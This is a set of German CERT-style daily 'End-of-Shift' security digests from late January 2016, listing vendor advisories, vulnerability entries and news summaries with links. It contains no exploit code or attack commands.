https://www.debian.org/security/2016/dsa-3459
*** Westermo Industrial Switch Hard-coded Certificate Vulnerability ***
---------------------------------------------
This advisory contains mitigation details for a hard-coded certificate vulnerability in Westermo's industrial switches.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-028-01
*** JBoss Data Virtualization Object Deserialization Flaw Lets Remote Users Execute Arbitrary Code on the Target System ***
---------------------------------------------
http://www.securitytracker.com/id/1034815
*** Cisco Small Business 500 Series Switches Denial of Service Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco Unity Connection User Search Cross-Site Scripting Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Multiple Vulnerabilities in OpenSSL (January 2016) Affecting Cisco Products ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** nginx DNS Processing Flaws Let Remote Users Deny Service ***
---------------------------------------------
http://www.securitytracker.com/id/1034869
*** Bugtraq: ProjectSend multiple vulnerabilities ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537402
*** Telegram (API) Cross Site Request Forgery ***
---------------------------------------------
Topic: Telegram (API) Cross Site Request Forgery; Risk: Medium; Text: Document Title: Telegram (API) - Cross Site Request Forgery Vulnerabilities References (Source): == http:/...
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016010208
*** HP Security Bulletins ***
---------------------------------------------
*** HPSBGN03542 rev.1 - HPE Operations Manager for Windows using Java Deserialization, Remote Arbitrary Code Execution ***
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04953244
---------------------------------------------
*** HPSBHF03539 rev.1 - HPE VCX running OpenSSH or BIND, Remote Denial of Service (DoS) ***
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04952480
---------------------------------------------
*** HPSBOV03540 rev.1 - HPE OpenVMS TCPIP Bind Services and OpenVMS TCPIP IPC Services for OpenVMS, Remote Disclosure of Information, Execution of Code, Denial of Service (DoS) ***
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04952488
---------------------------------------------
*** HPSBHF03510 rev.1 - HP Integrated Lights-Out 2/3/4, Remote Unauthorized Modification ***
https://h20566.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04949778
---------------------------------------------
*** Bugtraq: [security bulletin] HPSBHF03538 rev.1 - HPE iMC Service Health Manager (SHM) and iMC PLAT running Adobe Flash, Remote Code Execution, Denial of Service (DoS) ***
http://www.securityfocus.com/archive/1/537401
---------------------------------------------
*** Bugtraq: [security bulletin] HPSBHF03535 rev.3 - HPE iMC Service Health Manager (SHM) and iMC PLAT running Adobe Flash, Multiple Remote Vulnerabilities ***
http://www.securityfocus.com/archive/1/537400
---------------------------------------------
*** Novell Patches ***
---------------------------------------------
*** IDM 4.5 Engine & Remote Loader Service Pack 3 4.5.3 ***
https://download.novell.com/Download?buildid=Rjs_0SapjGg~
---------------------------------------------
*** IDM 4.5 Identity Applications 4.5.3 ***
https://download.novell.com/Download?buildid=N63wVOwZf_s~
---------------------------------------------
*** NetIQ Identity Manager Service Pack 3 - Designer 4.5.3 ***
https://download.novell.com/Download?buildid=QgHXVOxv310~
---------------------------------------------
*** iManager 2.7 Support Pack 7 - Patch 6 for Windows ***
https://download.novell.com/Download?buildid=RYH_EkORvU4~
---------------------------------------------
*** eDirectory 8.8 SP8 Patch 7 for Linux ***
https://download.novell.com/Download?buildid=l6ulyqWxDv8~
---------------------------------------------
*** eDirectory 8.8 SP8 Patch 7 for Windows ***
https://download.novell.com/Download?buildid=HTund35qCFk~
---------------------------------------------
*** eDirectory 8.8 SP8 Patch 7 (non-root) for Linux ***
https://download.novell.com/Download?buildid=Drw3BqUXIo4~
---------------------------------------------
*** iManager 2.7 Support Pack 7 - Patch 6 for Linux ***
https://download.novell.com/Download?buildid=E9m024HXLHw~
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Mittwoch 27-01-2016 18:00 − Donnerstag 28-01-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Google's VirusTotal now picks out suspicious firmware ***
---------------------------------------------
Google's VirusTotal service has added a new tool that analyzes firmware, the low-level code that bridges a computer's hardware and operating system at startup. Advanced attackers, including the U.S. National Security Agency, have targeted firmware as a place to embed malware since it's a great place to hide. Since antivirus programs "are not scanning this layer, the compromise can fly under the radar," wrote Francisco Santos, an IT security engineer with VirusTotal, in a blog post on...
---------------------------------------------
http://www.cio.com/article/3027050/googles-virustotal-now-picks-out-suspici…
*** Critical Israel power grid attack was just boring ransomware ***
---------------------------------------------
Minister puts nation on alert, SANS Institute says move along, nothing to see here ... The SANS Institute has moved to quell reports that Israel's energy grid has been hit by malware, revealing instead that the attacks were ransomware infecting the nation's utility regulatory authority.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2016/01/28/israel_powe…
*** ENISA Threat Landscape 2015, a must-read ***
---------------------------------------------
ENISA has issued the annual ENISA Threat Landscape 2015, a document that synthesizes the emerging trends in cyber security. I'm very happy to announce the publication of the annual ENISA Threat Landscape 2015 (ETL 2015); this is the fifth report issued by the European Agency. The ENISA Threat Landscape 2015 summarizes the top cyber threats experts have identified...
---------------------------------------------
http://securityaffairs.co/wordpress/43998/cyber-crime/enisa-threat-landscap…
*** Techie on the ground disputes BlackEnergy Ukraine power outage story ***
---------------------------------------------
And Russia? That's too convenient. A Ukrainian telecoms engineer has raised doubts about the widely reported link between BlackEnergy attacks and power outages in his country.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2016/01/27/ukraine_bla…
*** BlackEnergy APT Attacks in Ukraine employ spearphishing with Word documents ***
---------------------------------------------
A few days ago, we came by a new document that appears to be part of the ongoing BlackEnergy attacks against Ukraine. Unlike previous Office files used in the recent attacks, this is not an Excel workbook, but a Microsoft Word document.
---------------------------------------------
http://securelist.com/blog/research/73440/blackenergy-apt-attacks-in-ukrain…
*** Java Serialization Bug Crops Up At PayPal ***
---------------------------------------------
PayPal has rewarded two researchers with bug bounties for the discovery of a Java serialization vulnerability in manager.paypal.com
---------------------------------------------
http://threatpost.com/java-serialization-bug-crops-up-at-paypal/116054/
*** LG closes data-theft hole affecting millions of G3 smartphones ***
---------------------------------------------
Bug allows attackers to embed malicious code in data fed to phone.
---------------------------------------------
http://arstechnica.com/security/2016/01/lg-closes-data-theft-hole-affecting…
*** Oracle announces Java plugin deprecation, death ***
---------------------------------------------
With a short post by a member of the Java strategy team, Oracle has announced the approaching death of the hated Java plugin. "Oracle plans to deprecate the Java browser plugin in JDK 9. This techn...
---------------------------------------------
http://www.net-security.org/secworld.php?id=19385
*** DFN-CERT-2016-0166: OpenSSL: Two vulnerabilities allow bypassing security mechanisms and spying out information ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0166/
*** Bugtraq: Netgear GS105Ev2 - Multiple Vulnerabilities ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537389
*** Cisco Unity Connection Web Framework Cross-Site Scripting Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Multiple Vulnerabilities in Network Time Protocol Daemon Affecting Cisco Products - January 2016 ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Security Advisory: IPSec vulnerability CVE-2015-4047 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/05/sol05013313.html?…
*** Filr 1.2 - Security Update 1 ***
---------------------------------------------
Abstract: Security Updates for openSSH on the Filr, Search and MySQL 1.2.0 appliances; Document ID: 5233830; Security Alert: Yes; Distribution Type: Public; Entitlement Required: No; Files: MySQL-1.2.0.412.HP.zip (763.81 kB), Filr-1.2.0.857.HP.zip (763.86 kB), Search-1.2.0.996.HP.zip (763.83 kB); Products: Filr 1.2; Superseded Patches: None
---------------------------------------------
https://download.novell.com/Download?buildid=Sww_cAfKic0~
*** Filr 1.1 - Security Update 5 ***
---------------------------------------------
Abstract: Security Updates for openSSH on the Filr, Search and MySQL 1.1.0 appliances; Document ID: 5233810; Security Alert: Yes; Distribution Type: Public; Entitlement Required: No; Files: MySQL-1.1.0.386.HP.zip (763.82 kB), Search-1.1.0.823.HP.zip (763.83 kB), Filr-1.1.0.677.HP.zip (763.91 kB); Products: Filr 1.1; Superseded Patches: None
---------------------------------------------
https://download.novell.com/Download?buildid=GGjGx_IhcY4~
*** phpMyAdmin 4.5.4, 4.4.15.3, and 4.0.10.13 are released ***
---------------------------------------------
Welcome to phpMyAdmin 4.5.4, which contains regular bug fixes and a number of security fixes. The phpMyAdmin project also announces the release of versions 4.4.15.3 (a security release compatible with PHP versions as old as 5.3.7 and MySQL 5.5), and 4.0.10.13 (a security release compatible with PHP versions as old as 5.2 and MySQL 5). The security incidents will be documented in the upcoming PMASA-2016-1 through PMASA-2016-9, which will be available shortly at
---------------------------------------------
https://www.phpmyadmin.net/news/2016/1/28/phpmyadmin-454-44153-and-401013-a…
*** Bugtraq: HCA0005 - Liberty Global - Horizon HD STB - predictable WiFi passphrase ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537395
*** Bugtraq: Trend Micro Direct Pass - Filter Bypass & Persistent Web Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537396
=======================
= End-of-Shift report =
=======================
Timeframe: Dienstag 26-01-2016 18:00 − Mittwoch 27-01-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** BGP Route Hijacking - An Overview ***
---------------------------------------------
BGP is the mechanism by which autonomous networks exchange "reachability" information between each other. A network with an assigned or allocated prefix of addresses "advertises" the block of addresses to a neighboring BGP-speaking router; this is known as BGP peering. There is little hiding what BGP peering networks announce between each other. When two networks are reasonably small, and their assigned prefixes are limited and well known, enforcement of announcements...
---------------------------------------------
https://blog.team-cymru.org/2016/01/bgp-route-hijacking-an-overview/
*** More Fake Facebook "Security System Page" Scams ***
---------------------------------------------
We take a look at some variations on the same kind of Facebook scam currently doing the rounds.
---------------------------------------------
https://blog.malwarebytes.org/fraud-scam/2016/01/more-fake-facebook-securit…
*** If you're one of millions using Magento - stop whatever you're doing and patch now ***
---------------------------------------------
Ecommerce websites can be hijacked via critical flaw. A huge security hole has been found in popular ecommerce platform Magento, requiring an immediate update.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2016/01/26/urgent_mage…
*** New Magic ransomware abuses open-source educational code ***
---------------------------------------------
Malware based on open-source code, created for educational purposes only, has been spotted in the wild by Bleeping Computer's Lawrence Abrams.
---------------------------------------------
http://www.scmagazine.com/new-magic-ransomware-abuses-open-source-education…
*** Encryption: IETF standardises two more elliptic curves ***
---------------------------------------------
The IETF has officially approved the two elliptic curves Curve25519 and Curve448 as an RFC for cryptographic functions. Standardisation of the curves for key exchange in TLS is also expected.
---------------------------------------------
http://heise.de/-3084830
*** Security: when the printer becomes an anonymous file server ***
---------------------------------------------
Security problems often lie with the users of IT products. In a current case, a security researcher shows that attackers can anonymously store files on unprotected Hewlett-Packard network printers.
---------------------------------------------
http://www.golem.de/news/security-wenn-der-drucker-zum-anonymen-fileserver-…
*** The Rising Sophistication of Network Scanning ***
---------------------------------------------
In this article I would like to show you a hidden system that is hard at work scanning thousands, maybe millions, of unsuspecting devices. And I'll show how this system efficiently harvests each device's personal IP address and hands it off to a scanner, which proceeds to run a port/security scan against each unsuspecting victim for vulnerabilities.
---------------------------------------------
http://netpatterns.blogspot.co.uk/2016/01/the-rising-sophistication-of-netw…
*** SQL Injection Analysis ***
---------------------------------------------
It is one thing to be able to execute a simple SQL injection attack; it is another to do a proper investigation of such an attack. Unfortunately, there is not much information on SQL Injection analysis. This article will assist in providing some tools for basic Incident Response. It can be fairly easily translated to...
---------------------------------------------
http://resources.infosecinstitute.com/sql-injection-analysis/
*** RuhrSec 2016 - supported by SBA Research ***
---------------------------------------------
April 28, 2016 - April 29, 2016 - All Day Veranstaltungszentrum, Ruhr-Universität Bochum Universitätsstraße 150 Bochum
---------------------------------------------
https://www.sba-research.org/events/ruhrsec-2016/
*** TP-Link routers with predictable default Wi-Fi password ***
---------------------------------------------
Attackers can comparatively easily work out the factory Wi-Fi password of one TP-Link router series and thus gain access to the network. Further series could also be affected.
---------------------------------------------
http://heise.de/-3085482
*** Apple can read your iMessages despite them being encrypted ***
---------------------------------------------
Despite Apple taking a pro-encryption stance, with its CEO Tim Cook insisting that iMessages are safely encrypted, it turns out that if users back up data using iCloud Backup, they need to be aware that although Apple stores the backup in encrypted form, it uses its own key.
---------------------------------------------
http://www.scmagazine.com/apple-can-read-your-imessages-despite-them-being-…
*** Bugtraq: [security bulletin] HPSBGN03537 rev.1 - HPE IceWall Federation Agent and IceWall File Manager running libXML2, Remote or Local Denial of Service (DoS) ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537368
*** Bugtraq: [security bulletin] HPSBGN03536 rev.1 - HP IceWall Products running OpenSSL, Remote and Local Denial of Service (DoS) ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537367
*** pfSense Firewall 2.2.5 Cross Site Request Forgery ***
---------------------------------------------
Topic: pfSense Firewall 2.2.5 Cross Site Request Forgery; Risk: Low; Text: <!-- # Exploit Title: pfSense Firewall 2.2.5 Cross-Site Request Forgery # Date: 23-01-2016 # Software Link: http://mirror.a...
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016010178
*** Cisco Small Business SG300 Managed Switch Web Framework GUI Function Denial of Service Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco RV220W Management Authentication Bypass Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco Wide Area Application Service CIFS Denial of Service Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** MICROSYS PROMOTIC Memory Corruption Vulnerability ***
---------------------------------------------
This advisory contains mitigation details for a memory corruption vulnerability in the MICROSYS, spol. s r.o. PROMOTIC application.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-026-01
*** Rockwell Automation MicroLogix 1100 PLC Overflow Vulnerability ***
---------------------------------------------
This advisory contains mitigation details for a stack-based buffer overflow vulnerability in Rockwell Automation's Allen-Bradley MicroLogix 1100 programmable logic controller systems.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-026-02
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in OpenSSH affect IBM MQ Appliance (CVE-2016-0777) ***
http://www.ibm.com/support/docview.wss?uid=swg21975158
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in the GSKit component of Communications Server for Data Center Deployment, AIX, Linux, System z, and Windows (CVE-2016-0201) ***
http://www.ibm.com/support/docview.wss?uid=swg21974589
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in the GSKit component of Content Manager Enterprise Edition (CVE-2016-0201) ***
http://www.ibm.com/support/docview.wss?uid=swg21974700
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in the GSKit component of IBM Content Collector for SAP Applications (CVE-2016-0201) ***
http://www.ibm.com/support/docview.wss?uid=swg21974333
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in the GSKit component of IBM Sterling Connect:Direct for Microsoft Windows (CVE-2016-0201) ***
http://www.ibm.com/support/docview.wss?uid=swg21974407
---------------------------------------------
*** IBM Security Bulletin: A vulnerability has been addressed in the GSKit component of IBM Security Directory Server (CVE-2016-0201) ***
http://www.ibm.com/support/docview.wss?uid=swg21975404
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in the GSKit component of IBM Personal Communications (CVE-2016-0201) ***
http://www.ibm.com/support/docview.wss?uid=swg21974947
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in openssl affect Power Hardware Management Console (CVE-2015-3193, CVE-2015-3194, CVE-2015-3195, CVE-2015-3196, CVE-2015-1794) ***
http://www.ibm.com/support/docview.wss?uid=nas8N1021091
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in Apache Commons affects IBM Kenexa LMS along with IBM Kenexa Participate, IBM Kenexa LCMS on Cloud (CVE-2015-7450) ***
http://www.ibm.com/support/docview.wss?uid=swg21972995
---------------------------------------------
*** IBM Security Bulletin: Security Bulletin: Vulnerabilities in Java affect Power Hardware Management Console (CVE-2015-4843 CVE-2015-4868 CVE-2015-4806 CVE-2015-4872 CVE-2015-4911 CVE-2015-4893 CVE-2015-4842 CVE-2015-4803) ***
http://www.ibm.com/support/docview.wss?uid=nas8N1021090
---------------------------------------------
*** IBM Security Bulletin: Two vulnerabilities exist in IBM Case Foundation and FileNet Business Process Manager (CVE-2012-5784 and CVE-2014-3596) ***
http://www.ibm.com/support/docview.wss?uid=swg21965451
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects IBM MQ Appliance (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21974599
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects RIT and RTCP in Rational Test Workbench, RTCP and RIT Agent in Rational Test Virtualization Server, and RIT Agent in Rational Performance Test Server (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21974922
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects IBM i (CVE-2015-7575). ***
http://www.ibm.com/support/docview.wss?uid=nas8N1021096
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in the GSKit component of IBM MQ Appliance (CVE-2016-0201) ***
http://www.ibm.com/support/docview.wss?uid=swg21974598
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in the GSKit component of IBM Security SiteProtector System (CVE-2016-0201) ***
http://www.ibm.com/support/docview.wss?uid=swg21974980
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in the GSKit component of Content Manager OnDemand for Multiplatforms (CVE-2016-0201) ***
http://www.ibm.com/support/docview.wss?uid=swg21974698
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in the GSKit component of IBM Sterling Connect:Direct for UNIX (CVE-2016-0201) ***
http://www.ibm.com/support/docview.wss?uid=swg21974884
---------------------------------------------
*** IBM Security Bulletin: IBM Platform Application Center Standard Edition is affected by a security vulnerability (CVE-2015-7450) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023269
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in the GSKit component of Transformation Extender (CVE-2016-0201, CVE-2015-7421, CVE-2015-7420) ***
http://www.ibm.com/support/docview.wss?uid=swg21972246
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Security Guardium ***
http://www.ibm.com/support/docview.wss?uid=swg21973723
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Montag 25-01-2016 18:00 − Dienstag 26-01-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Cisco Unified Contact Center Express Cross-Site Scripting Vulnerability ***
---------------------------------------------
A vulnerability in the HTTP web-based management interface of the Cisco Unified Contact Center Express could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web interface of the affected system. This vulnerability applies to all Permanent Web Links ..
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco Application Policy Infrastructure Controller Enterprise Module SNMP Hostname Cross-Site Scripting Vulnerability ***
---------------------------------------------
A vulnerability in the Simple Network Management Protocol (SNMP) query process of the Cisco Application Policy Infrastructure Controller Enterprise Module (APIC-EM) could allow an unauthenticated, remote attacker to perform a cross-site scripting (XSS) attack.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** DSA-3453 mariadb-10.0 - security update ***
---------------------------------------------
https://www.debian.org/security/2016/dsa-3453
*** Symantec partner caught running tech support scam ***
---------------------------------------------
Tech support scammers are known for their cheek -- making unfounded claims that PCs are infected to scare consumers into parting with their money -- but a Symantec partner took nerve to a new level, a security company claimed last week. According to San Jose, Calif.-based Malwarebytes, Silurian ..
---------------------------------------------
http://www.cio.com/article/3026356/security/symantec-partner-caught-running…
*** Pentest Time Machine: NMAP + Powershell + whatever tool is next ***
---------------------------------------------
Early on in many penetration tests or security assessments, you will often find yourself wading through what seems like hundreds or thousands of text files, each seemingly hundreds or thousands of pages long (likely because they are). One ..
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20653&
*** Appointment Booking Calendar <= 1.1.23 - Unauthenticated SQL Injection ***
---------------------------------------------
https://wpvulndb.com/vulnerabilities/8366
*** PDF reader Foxit Reader vulnerable to malicious code ***
---------------------------------------------
New versions secure Foxit PhantomPDF and Foxit Reader. Both applications can be attacked remotely, and attackers can smuggle their own code onto computers.
---------------------------------------------
http://heise.de/-3084161
*** Car-sharing provider: Phishing attack on Car2go users ***
---------------------------------------------
Anyone who is asked by an online service to 'verify' their data should always be cautious. A phishing campaign is currently running against users of Daimler's car-sharing service.
---------------------------------------------
http://www.golem.de/news/carsharing-anbieter-phishing-angriff-auf-car2go-nu…
*** Security update for OpenSSL is coming ***
---------------------------------------------
New OpenSSL versions are to close two security holes. The OpenSSL team rates the severity of one of the vulnerabilities as high.
---------------------------------------------
http://heise.de/-3084227
*** WP Easy Gallery <= 4.1.4 - Reflected Cross-Site Scripting (XSS) ***
---------------------------------------------
https://wpvulndb.com/vulnerabilities/8367
*** Curve25519/Curve447: New elliptic curves from the IETF ***
---------------------------------------------
The IETF's crypto working group has published RFC 7748. It specifies the two elliptic curves Curve25519 and Curve447. The agreement is the result of a long discussion.
---------------------------------------------
http://www.golem.de/news/curve25519-curve447-neue-elliptische-kurven-von-de…
*** Battling Business Email Compromise Fraud: How Do You Start? ***
---------------------------------------------
In May 2014, an accountant to a Texas manufacturing firm received an email from a familiar correspondent, his company's CEO. The email instructed him to wait for a call from a partner company and warned against sharing the email to anyone ..
---------------------------------------------
http://blog.trendmicro.com/trendlabs-security-intelligence/battling-busines…
*** Oracle Pushes Java Fix: Patch It or Pitch It ***
---------------------------------------------
Oracle has shipped an update for its Java software that fixes at least eight critical security holes. If you have an affirmative use for Java, please update to the latest version; if you're not sure why you have Java installed, it's high time to remove the program once and for all.
---------------------------------------------
http://krebsonsecurity.com/2016/01/oracle-pushes-java-fix-patch-it-or-pitch…
*** Symantec detects 3,500 servers infected with a malicious script ***
---------------------------------------------
Symantec reported the worldwide infection of 3,500 public servers with a malicious script that redirects its victims to other compromised websites and said it believes could be part of a recon effort for future attacks.
---------------------------------------------
http://www.scmagazine.com/symantec-detects-3500-servers-infected-with-a-mal…
*** After the hack: Vtech goes partly back online ***
---------------------------------------------
Toy manufacturer Vtech was criticised at the end of last year for major security flaws and subsequently took many of its services offline. Now some products are going back online, and the company says it has learned its lesson on security.
---------------------------------------------
http://www.golem.de/news/nach-dem-hack-vtech-geht-wieder-ein-bisschen-onlin…
=======================
= End-of-Shift report =
=======================
Timeframe: Freitag 22-01-2016 18:00 − Montag 25-01-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** ZDI-16-023: Oracle GoldenGate Veridata File Upload Remote Code Execution Vulnerability ***
---------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Oracle GoldenGate. Authentication is not required to exploit this vulnerability.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-16-023/
*** Hospira Multiple Products Buffer Overflow Vulnerability ***
---------------------------------------------
Jeremy Richards of SAINT Corporation has identified a buffer overflow vulnerability in Hospira's LifeCare PCA Infusion System. Hospira has determined that LifeCare PCA Infusion Systems released prior to July 2009 that are running Communication Engine (CE) Version 1.0 or earlier are vulnerable. In response to Jeremy ..
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-15-337-02
*** Security Advisory: Stored XSS in Magento ***
---------------------------------------------
During our regular research audits for our Cloud-based WAF, we discovered a Stored XSS vulnerability affecting the Magento platform that can be easily exploited remotely. We notified the Magento team and worked with them to get it fixed.
---------------------------------------------
https://blog.sucuri.net/2016/01/security-advisory-stored-xss-in-magento.html
*** 'Deliberate' Backdoor Removed From Secure Conferencing Gear ***
---------------------------------------------
AMX, a provider of audio-visual conferencing gear used in sensitive government and military locations, has removed a 'deliberate' backdoor in one of its central controller system products.
---------------------------------------------
http://threatpost.com/deliberate-backdoor-removed-from-secure-conferencing-…
*** Rsync Symlink Path Validation Flaw Lets Remote Users Write Files on the Target System ***
---------------------------------------------
http://www.securitytracker.com/id/1034786
*** JavaScript Backdoor ***
---------------------------------------------
Casey Smith recently shared his research on twitter, which is to reverse HTTP Shell by using JavaScript. I found it rather interesting and further analyzed this technique.
---------------------------------------------
http://en.wooyun.io/2016/01/18/JavaScript-Backdoor.html
*** Snowden exposes fake "crypto mail" in IS video ***
---------------------------------------------
The terrorist organisation had threatened further attacks in the message.
---------------------------------------------
http://derstandard.at/2000029688150
*** Fortinet: More backdoors, more patches ***
---------------------------------------------
Only last week it became known that some Fortinet firewall products allow access with default passwords. Now the company has analysed its own products and found further vulnerable devices.
---------------------------------------------
http://www.golem.de/news/fortinet-mehr-hintertueren-mehr-patches-1601-11872…
*** CVE-2015-8651 (Flash up to 20.0.0.228/235) and Exploit Kits ***
---------------------------------------------
http://malware.dontneedcoffee.com/2016/01/cve-2015-8651.html
*** Multi-factor authentication: New vPro generation brings Intel Authenticate ***
---------------------------------------------
With the sixth generation of the Core i (Skylake) and the launch of the corresponding business platform, Intel now wants to offer more security solutions in vPro as well. Operating-system-independent firmware and direct addressing of the graphics card are meant to leave keyloggers no chance.
---------------------------------------------
http://www.golem.de/news/multi-faktor-authentifizierung-neue-vpro-generatio…
*** RSA Conference disables Twitter password-collecting form ***
---------------------------------------------
After a storm of criticism and shaming over the blurb-tweeting feature, the organizers said that they had used OAuth and hadn't collected passwords.
---------------------------------------------
https://nakedsecurity.sophos.com/2016/01/25/rsa-conference-disables-twitter…
*** Linux kernel : Denial of service with specially crafted key file. ***
---------------------------------------------
An issue in the ASN.1 DER decoder was reported: a specially crafted key can lead to a kernel panic via X.509 certificate DER signature parsing.
---------------------------------------------
http://www.openwall.com/lists/oss-security/2016/01/25/2
*** Security patches: Attackers can hijack websites running Magento shops ***
---------------------------------------------
Magento is securing its shop system. The vendor closes two holes rated critical through which attackers can take over admin sessions.
---------------------------------------------
http://heise.de/-3083645
*** Hard-Coded Password Found in Lenovo File-Sharing App ***
---------------------------------------------
Lenovo's SHAREit file-sharing app for Windows and Android has been patched against vulnerabilities that put private data at risk.
---------------------------------------------
http://threatpost.com/hard-coded-password-found-in-lenovo-file-sharing-app/…
*** Hack Brief: Don't Be Trolled by This iPhone-Crashing Link Meme ***
---------------------------------------------
Pranksters are passing a link to "crashsafari.com" around social media, which immediately crashes iPhones and iPads.
---------------------------------------------
http://www.wired.com/2016/01/hack-brief-dont-be-trolled-by-this-iphone-cras…
=======================
= End-of-Shift report =
=======================
Timeframe: Donnerstag 21-01-2016 18:00 − Freitag 22-01-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Scanning for Fortinet ssh backdoor, (Thu, Jan 21st) ***
---------------------------------------------
On 11 Jan, a Python script was posted on the full-disclosure mailing list that took advantage of a hardcoded ssh password in some older versions of various products from Fortinet (see complete list in Ref [1] below). Looking at our collected ssh data, we've seen an increase in scanning for those devices in the days since the revelation of the vulnerability. Nearly all of this scanning has come from two IPs in China (124.160.116.194 and 183.131.19.18). So if you...
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20635&rss
*** Unknown attackers are infecting home routers via dating sites ***
---------------------------------------------
Damballa researchers have spotted an active campaign aimed at infecting as many home routers as possible with a worm. A variant of the TheMoon worm, it works by taking advantage of a weakness in the H...
---------------------------------------------
http://www.net-security.org/malware_news.php?id=3192
*** Security: Credit cards with chip and PIN can be copied too ***
---------------------------------------------
It was previously known that credit cards with magnetic stripes can be copied with trivial means. Current research shows that cards using the better-secured chip-and-PIN procedure can also be copied, because some banks are sloppy.
---------------------------------------------
http://www.golem.de/news/security-auch-kreditkarten-mit-chip-und-pin-koenne…
*** Fraunhofer ESK: Skype is a security risk for companies ***
---------------------------------------------
Scientists at the Fraunhofer ESK institute have examined Microsoft's instant messaging service Skype and advise companies against using it. Their security concerns stem mainly from the network architecture and the encryption.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Fraunhofer-ESK-Skype-ist-Sicherheits…
*** Extracting pcap from memory , (Fri, Jan 22nd) ***
---------------------------------------------
I have talked many times about memory forensics and how useful it is. In this diary I am going to talk about how to extract a pcap file from a memory image using bulk_extractor. Of course, when we are extracting a pcap file from a memory image we are not going to have everything, but there will be some remnants that can help in our investigation. bulk_extractor is a computer forensics tool that scans a disk image, a file, or a directory of files and extracts useful information without parsing the...
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20639&rss
*** Trojan.DNSChanger circumvents Powershell restrictions ***
---------------------------------------------
We take a close look at the functionality of a new variant of the DNS-changer adware family, especially the use of encoded scripts as a way to bypass the Powershell execution protection.
---------------------------------------------
https://blog.malwarebytes.org/security-threat/2016/01/trojan-dnschanger-cir…
*** Citrix XenServer Security Update for CVE-2016-1571 ***
---------------------------------------------
A security vulnerability has been identified in Citrix XenServer that could, if exploited, allow a malicious administrator of a guest VM to crash the host in certain deployments. This vulnerability affects all currently supported versions of Citrix XenServer up to and including Citrix XenServer 6.5 Service Pack 1.
---------------------------------------------
https://support.citrix.com/article/CTX205496
*** Multiple Buffalo network devices vulnerable to cross-site scripting ***
---------------------------------------------
Multiple network devices provided by BUFFALO INC. contain a cross-site scripting vulnerability.
---------------------------------------------
http://jvn.jp/en/jp/JVN49225722/
